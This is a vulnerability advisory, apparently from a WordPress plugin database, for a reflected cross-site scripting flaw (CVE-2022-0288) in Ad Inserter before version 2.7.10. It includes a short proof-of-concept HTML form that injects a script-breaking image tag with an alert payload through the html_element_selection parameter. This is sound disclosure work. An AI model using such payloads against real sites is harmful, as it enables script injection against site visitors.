Ad Inserter < 2.7.10 – Reflected Cross-Site Scripting | CVE 2022-0288 | Plugin Vulnerabilities

Description

The plugins do not sanitise and escape the html_element_selection parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting

Proof of Concept

<form action="https://example.com/" method="POST">
    <input type="text" name="html_element_selection" value="</script><img src onerror=alert(/XSS/)>">
    <input type="submit" value="Exploit me pls" />
</form>

Affects Plugins

Fixed in 2.7.10

ad-inserter-pro

Fixed in 2.7.10

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

Krzysztof Zając

Submitter

Krzysztof Zając

Submitter website

https://kazet.cc/

Verified

Yes

WPVDB ID

27b64412-33a4-462c-bc45-f81697e4fe42

Timeline

Publicly Published

2022-01-24 (about 3 years ago)

Added

2022-01-24 (about 3 years ago)

Last Updated

2022-04-11 (about 3 years ago)

Other

Published

Title

Published

2014-08-01

Title

WP Super Cache 1.3 - trunk/plugins/awaitingmoderation.php URI XSS

Published

2025-02-18

Title

XV Random Quotes <= 1.40 - Settings Reset via CSRF

Published

2021-12-01

Title

Booster for WooCommerce < 5.4.9 - Reflected Cross-Site Scripting in General Module

Published

2023-05-11

Title

Add Posts to Pages <= 1.4.1 - Contributor+ Stored XSS

Published

2021-06-28

Title

Youzify < 1.0.7 - Stored Cross-Site Scripting via Biography